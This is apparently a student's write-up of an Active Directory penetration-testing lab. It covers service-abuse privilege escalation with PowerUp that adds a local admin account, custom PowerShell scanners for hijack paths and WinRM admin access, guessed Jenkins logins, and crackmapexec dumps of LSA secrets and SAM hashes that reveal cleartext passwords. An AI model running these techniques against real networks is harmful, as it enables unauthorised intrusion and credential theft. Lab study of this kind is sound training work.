# Learning Objective - 5

## 5. Service abused on the student VM for local privilege escalation

```
PS C:\AD\Tools> Import-Module .\PowerUp.ps1
PS C:\AD\Tools> Get-ServiceUnquoted -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True

PS C:\AD\Tools> Get-ModifiableService -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True
```

PowerUp reports three independent weaknesses on the same service, and any one of them is enough for code execution as LocalSystem because the service runs as `LocalSystem` and the current user can restart it (`CanRestart : True`): the binary path is unquoted and `BUILTIN\Users` can create files and subdirectories in `C:\WebServer`, so a planted `C:\WebServer\Abyss.exe` would be started before the real binary; the service directory `C:\WebServer\Abyss Web Server` is writable by `Everyone`, so `abyssws.exe` itself can be replaced; and the current user holds `ChangeConfig` on the service, so its binary path can simply be rewritten.

Answer:

```
AbyssWebServer
```
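The unquoted-path finding above only tells you that `C:\WebServer` is modifiable. The following is an added example, not PowerUp code, that enumerates the hijack paths Windows would try for a given unquoted binary path and confirms writability with a real file write instead of reading the ACL. The `BinPath` value is the AbyssWebServer path from the PowerUp output; the function itself is generic.

```powershell
# Added example, not PowerUp code: given a service's unquoted binary path, list the
# executables Windows would try before the real one and test whether the current user
# can actually write to each parent directory. The BinPath below is the AbyssWebServer
# path from the PowerUp output; everything else is generic.
function Get-UnquotedPathHijackCandidates {
    param([Parameter(Mandatory)][string]$BinPath)

    # A quoted path is resolved literally and is not affected by this bug.
    if ($BinPath.StartsWith('"')) { return @() }

    # Strip service arguments: keep everything up to and including the first ".exe".
    $idx = $BinPath.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    if ($idx -lt 0) { return @() }
    $exePath = $BinPath.Substring(0, $idx + 4)

    # CreateProcess treats each space as a possible end of the image name and appends
    # ".exe", so C:\WebServer\Abyss Web Server\abyssws.exe is tried as
    # C:\WebServer\Abyss.exe, then C:\WebServer\Abyss Web.exe, then the real file.
    $parts = $exePath.Split(' ')
    for ($i = 1; $i -lt $parts.Length; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
        $dir = Split-Path -Parent $candidate

        # ACL strings can mislead (inherited denies, missing traverse rights), so probe
        # with a real write of a zero-byte file and remove it again.
        $writable = $false
        try {
            $probe = Join-Path $dir ([System.IO.Path]::GetRandomFileName())
            [System.IO.File]::WriteAllText($probe, '')
            Remove-Item -LiteralPath $probe -Force
            $writable = $true
        } catch {
            $writable = $false
        }

        [pscustomobject]@{
            HijackPath = $candidate
            Directory  = $dir
            Writable   = $writable
        }
    }
}

Get-UnquotedPathHijackCandidates -BinPath 'C:\WebServer\Abyss Web Server\abyssws.exe -service'
```

The probe does create and delete a file in each directory, so it leaves a trace; use it deliberately. A `Writable = True` for `C:\WebServer` corresponds to the `AppendData/AddSubdirectory` and `WriteData/AddFile` rights PowerUp reported. Whatever is dropped at the hijack path must behave like a service binary, or at least finish its work before the Service Control Manager gives up waiting for it to report running; that is what PowerUp's `Write-ServiceBinary` takes care of.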

Exploitation. PowerUp's service-permissions check also lists SNMPTRAP (running as `LocalSystem`, restartable, with `Invoke-ServiceAbuse` offered as the abuse function), and that is the service abused below; the same abuse would work against AbyssWebServer, which has the same `ChangeConfig` weakness:

```
[*] Checking service permissions...


ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
```

```
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP'
WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop...

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add


PS C:\AD\Tools> net users

User accounts for \\DCORP-STD723

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
john                     WDAGUtilityAccount
The command completed successfully.
```

`Invoke-ServiceAbuse` stops the service, rewrites its binary path to the `net user ... && net localgroup ...` command, starts the service so that the command runs as LocalSystem (the start itself fails because the command is not a real service binary, but by then it has executed), and then restores the original binary path. The new local administrator `john` now exists, so we start a cmd as administrator.

<figure><img src="/files/H011RZww2XKD0cj3wLEK" alt=""><figcaption></figcaption></figure>

Then we add our own domain user to the local Administrators group. Both steps are noisy: creating an account and changing local group membership produce Security log events 4720 and 4732, so record them for cleanup and expect them to be seen by a SOC.

```
C:\Windows\system32>net localgroup Administrators dcorp\student723 /add
The command completed successfully.


C:\Windows\system32>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dcorp\Domain Admins
dcorp\student723
john
The command completed successfully.

```

## Script used to find local admin access with PowerShell Remoting

First attempt, with PowerView:

```
PS C:\AD\Tools> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed
```

No results. PowerView's `Find-LocalAdminAccess` tests access by opening the remote Service Control Manager (SMB/RPC), so it only reports hosts where that path is reachable and the caller is admin. The `Error disposing of the Results object` verbose line is a harmless PowerView quirk, not the cause.

Second attempt, over WMI. The hostnames from `Get-NetComputer` go into `computers.txt` (one per line, without the trailing `$`, which belongs to the machine account name, not the hostname):

```
PS C:\AD\Tools> Get-NetComputer | select samaccountname

samaccountname
--------------
DCORP-DC$
DCORP-ADMINSRV$
DCORP-APPSRV$
DCORP-CI$
DCORP-MGMT$
DCORP-MSSQL$
DCORP-SQL1$
DCORP-STDADMIN$
DCORP-STD721$
DCORP-STD722$
DCORP-STD724$
DCORP-STD723$
DCORP-STD726$
DCORP-STD729$
DCORP-STD725$
DCORP-STD728$
DCORP-STD727$
DCORP-STD731$
DCORP-STD732$
DCORP-STD730$
DCORP-STD733$
DCORP-STD735$
DCORP-STD734$
DCORP-STD736$
DCORP-STD737$
DCORP-STD739$
DCORP-STD740$
DCORP-STD738$
```

```
PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
```

No results either. `Find-WMILocalAdminAccess` tests over WMI (DCOM: TCP 135 plus a dynamic high port), a different transport from the SCM check above.

Third attempt, over WinRM (TCP 5985), which does return hosts:

```
PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-std723
dcorp-adminsrv

PS C:\AD\Tools> nslookup dcorp-adminsrv
Server:  UnKnown
Address:  172.16.2.1

Name:    dcorp-adminsrv.dollarcorp.moneycorp.local
Address:  172.16.4.101
```
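The three attempts above differ only in the transport used to test admin access (SCM over SMB/RPC, WMI over DCOM, and WinRM). The following is an added example that implements the WinRM variant; it is not the lab's `Find-PSRemotingLocalAdminAccess.ps1` (whose source is not on this page). It assumes PowerView is loaded for `Get-NetComputer`; pass `-ComputerName` with your own list otherwise.

```powershell
# Added example, not the lab's Find-PSRemotingLocalAdminAccess.ps1 (that script's source is not
# on this page): check every domain computer for local admin access over WinRM (TCP 5985).
# By default only members of the local Administrators or Remote Management Users groups can
# open a remote PowerShell session, so a successful Invoke-Command is a strong admin signal;
# rule out the second group if a hit matters. Assumes PowerView is loaded for Get-NetComputer.
function Find-WinRMAdminAccess {
    param(
        [string[]]$ComputerName = (Get-NetComputer |
            Select-Object -ExpandProperty samaccountname |
            ForEach-Object { $_.TrimEnd('$') }),   # DCORP-STD723$ -> DCORP-STD723
        [int]$TimeoutSeconds = 3
    )

    foreach ($c in $ComputerName) {
        # Cheap TCP probe first, so unreachable hosts do not block on the WSMan timeout.
        $reachable = $false
        $tcp = New-Object System.Net.Sockets.TcpClient
        try {
            $ar = $tcp.BeginConnect($c, 5985, $null, $null)
            if ($ar.AsyncWaitHandle.WaitOne($TimeoutSeconds * 1000)) {
                $tcp.EndConnect($ar)     # throws if the connect actually failed
                $reachable = $true
            }
        } catch { } finally { $tcp.Close() }
        if (-not $reachable) { continue }

        try {
            # Uses the current token; add -Credential to test another account.
            $name = Invoke-Command -ComputerName $c -ScriptBlock { [Environment]::MachineName } -ErrorAction Stop
            [pscustomobject]@{ ComputerName = $c; AdminAccess = $true;  Detail = "session on $name" }
        } catch {
            # "Access is denied" = reachable but not admin; anything else is a WinRM/auth problem.
            [pscustomobject]@{ ComputerName = $c; AdminAccess = $false; Detail = $_.Exception.Message }
        }
    }
}

Find-WinRMAdminAccess | Where-Object AdminAccess | Select-Object -ExpandProperty ComputerName
```

Every successful `Invoke-Command` creates a `wsmprovhost.exe` process and a logon event on the target, so this check is as visible as the `Enter-PSSession` that follows it; keep the list short when stealth matters.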

{% code overflow="wrap" %}

```
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> ls
[dcorp-adminsrv]: PS C:\Users\student723\Documents> cd ..
[dcorp-adminsrv]: PS C:\Users\student723> cd /
[dcorp-adminsrv]: PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/11/2022  12:55 AM                Program Files
d-----          5/8/2021   2:34 AM                Program Files (x86)
d-----         12/3/2023   6:36 AM                Transcripts
d-r---         2/20/2024   4:42 PM                Users
d-----         1/10/2024   1:05 AM                Windows


```

{% endcode %}

## Jenkins user used to access Jenkins web console

<http://172.16.3.11:8080/>

<figure><img src="/files/oA4Q6e0XcTkJAVufu2hO" alt=""><figcaption></figcaption></figure>

Credentials tried on the login form:

```
manager:manager
```

<figure><img src="/files/Nm5LtBSsAUqXP6uwpQ5e" alt=""><figcaption></figcaption></figure>

```
builduser:builduser
```

<figure><img src="/files/PBwEETumUmC3EJStAIr0" alt=""><figcaption></figcaption></figure>

Link: <http://172.16.3.11:8080/job/Project0/configure>

<figure><img src="/files/VwEiHL1F7tFWQbruW8NO" alt=""><figcaption></figcaption></figure>

Then we get the result:

<figure><img src="/files/UUYz98Op3b2adUgK2a0F" alt=""><figcaption></figcaption></figure>

Answer:

```
builduser
```

## Domain user used for running Jenkins service on dcorp-ci

<figure><img src="/files/qG7FPEV5blwm4F79nbWc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/aGLHNPiDuRk8EXjNzCYn" alt=""><figcaption></figcaption></figure>

Answer:

```
dcorp\ciadmin
```

Bonus: dumping secrets from dcorp-ci

<figure><img src="/files/2pVuIdjKsxFkZTmaxn2T" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/shaKbVcGHXRcETXvjLSW" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BR278DmKSLNW45xgoGXw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Dw7tsan7RYrVGVJGt8Qe" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/X10yEbNflf48PQGdZfey" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oHKilY598S3A68bG94gw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/wqROycl6fdTZ364IRMHy" alt=""><figcaption></figcaption></figure>

```
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping LSA secrets
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.3.11     445    DCORP-CI         dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c
SMB         172.16.3.11     445    DCORP-CI         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.3.11     445    DCORP-CI         dcorp\ciadmin:*ContinuousIntrusion123
SMB         172.16.3.11     445    DCORP-CI         [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached

```

Reading the dump: `--lsa` needs local admin on the target, and the `(Pwn3d!)` tag confirms student723 has it on DCORP-CI. The `$DCC2$` lines are cached domain logons (MS-Cache v2: slow to crack and not usable for pass-the-hash), the `DCORP-CI$` lines are the machine account's Kerberos keys and NT hash, `dpapi_machinekey`/`dpapi_userkey` are the DPAPI_SYSTEM secret, and `NL$KM` is the key protecting the cached logons. The line that matters here is the last one: the cleartext password of `dcorp\ciadmin`, the account the Jenkins service runs as. The Service Control Manager stores the password of every service that logs on as a user account in the LSA secret `_SC_<ServiceName>`, which any local administrator can decrypt.
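The Jenkins service account answer (`dcorp\ciadmin`) and the cleartext recovered by `--lsa` are the same fact seen from two sides: a service configured to log on as a user account leaves that account's password in an LSA secret. The following added example, not course code, lists the services on a host whose logon account is a real user and therefore has a recoverable secret; it assumes nothing beyond the built-in CIM cmdlets, and `-ComputerName` is an optional parameter for querying a remote host.

```powershell
# Added example, not course code: list services whose logon account is a real user instead of a
# built-in identity. Windows stores such a service's password in the LSA secret _SC_<ServiceName>,
# which any local administrator can decrypt; that is exactly where the dcorp\ciadmin cleartext
# in the crackmapexec --lsa output came from. Runs locally by default; -ComputerName queries a
# remote host over CIM/WinRM (admin rights there required).
function Get-ServiceLogonAccounts {
    param([string]$ComputerName)

    # Identities with no recoverable password: the three built-ins and NT SERVICE\ virtual accounts.
    $builtin = '^(LocalSystem|NT AUTHORITY\\(Local|Network)Service|NT SERVICE\\)'

    $cim = @{ ClassName = 'Win32_Service' }
    if ($ComputerName) { $cim.ComputerName = $ComputerName }

    Get-CimInstance @cim |
        Where-Object { $_.StartName -and $_.StartName -notmatch $builtin } |
        ForEach-Object {
            [pscustomobject]@{
                Service      = $_.Name
                LogonAccount = $_.StartName                 # e.g. dcorp\ciadmin
                # (g)MSA passwords (names ending in $) are fetched from AD, not kept in _SC_.
                StoredInLsa  = -not $_.StartName.EndsWith('$')
                LsaSecret    = "_SC_$($_.Name)"
                State        = $_.State
                BinaryPath   = $_.PathName
            }
        }
}

Get-ServiceLogonAccounts | Sort-Object LogonAccount | Format-Table -AutoSize
```

Run this on any host you already administer: each `StoredInLsa = True` row is a credential that a local admin (or a dumped LSA policy) hands over in cleartext, and a domain account in that column is the lateral-movement lead, as `ciadmin` was here. Moving such services to a (group) managed service account removes the stored secret.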

```
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping SAM hashes
SMB         172.16.3.11     445    DCORP-CI         Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2:::
SMB         172.16.3.11     445    DCORP-CI         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         [+] Added 4 SAM hashes to the database

```

The `--sam` dump only covers local accounts. The RID 500 `Administrator` NT hash is still useful: if the same local administrator password is reused on other hosts, it works for pass-the-hash against them without cracking.

